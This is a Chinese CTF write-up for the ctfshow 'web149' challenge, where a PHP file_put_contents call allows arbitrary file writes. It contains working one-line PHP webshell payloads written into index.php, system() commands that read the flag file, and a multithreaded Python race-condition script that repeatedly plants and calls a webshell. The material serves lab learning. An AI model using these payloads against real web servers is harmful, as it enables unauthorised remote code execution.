web149笔记(file_put_contents函数+条件竞争)
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-19 04:34:40 */ error_reporting(0); highlight_file(__FILE__); $files = scandir('./'); foreach($files as $file) { if(is_file($file)){ if ($file !== "index.php") { unlink($file); } } } file_put_contents($_GET['ctf'], $_POST['show']); $files = scandir('./'); foreach($files as $file) { if(is_file($file)){ if ($file !== "index.php") { unlink($file); } } }
这里用file_put_contents函数写入文件,并且会有两个for循环判断不是index.php的文件会被删除,所以我们直接把一句话木马写进index.php就可以,payload如下
?ctf=index.php post: show=<?php @eval($_POST[mm]);?>
接着再index.php里利用我们的马即可POST马
url+index.php post:mm=system("cat /ctfshow_fl0g_here.txt");
GET马
GET:?ctf=index.php
POST:show=<?php @eval($_GET[1]);?>
然后访问index.php,GET传1=system('tac /ctfshow_fl0g_here.txt');
https://ecb9750f-6a28-4cf2-a08d-537a7cf8f5c5.challenge.ctf.show/?1=system(%27tac%20/ctfshow_fl0g_here.txt%27);
但是此处存在条件竞争删除
import threading import requests import time flag = 1 def write(): while 1: url = "http://5b684686-4c1c-4d84-8426-b24cff7e49c3.challenge.ctf.show:8080/"+"?ctf=4.php" fromdata={"show":"<?php eval($_GET['S']);?>"} response = requests.post(url=url,data=fromdata) print(response.status_code) def read(): global flag while 1: #cmd = "system('ls /')" url = "http://5b684686-4c1c-4d84-8426-b24cff7e49c3.challenge.ctf.show:8080/4.php?S=system('tac /ctfshow_fl0g_here.txt');" response = requests.get(url=url) if response.status_code == 200: print(response.text) flag = 0; break; # threads = [] # t1 = threading.Thread(target=write) # t2 = threading.Thread(target=read) # threads.append(t1) # threads.append(t2) if __name__ == '__main__': for i in range(10): t1 = threading.Thread(target=write) t1.setDaemon(True) t1.start() for i in range(10): t2 = threading.Thread(target=read) t2.setDaemon(True) t2.start() # for t in threads: # t.join() while flag: time.sleep(0.01)
浙公网安备 33010602011771号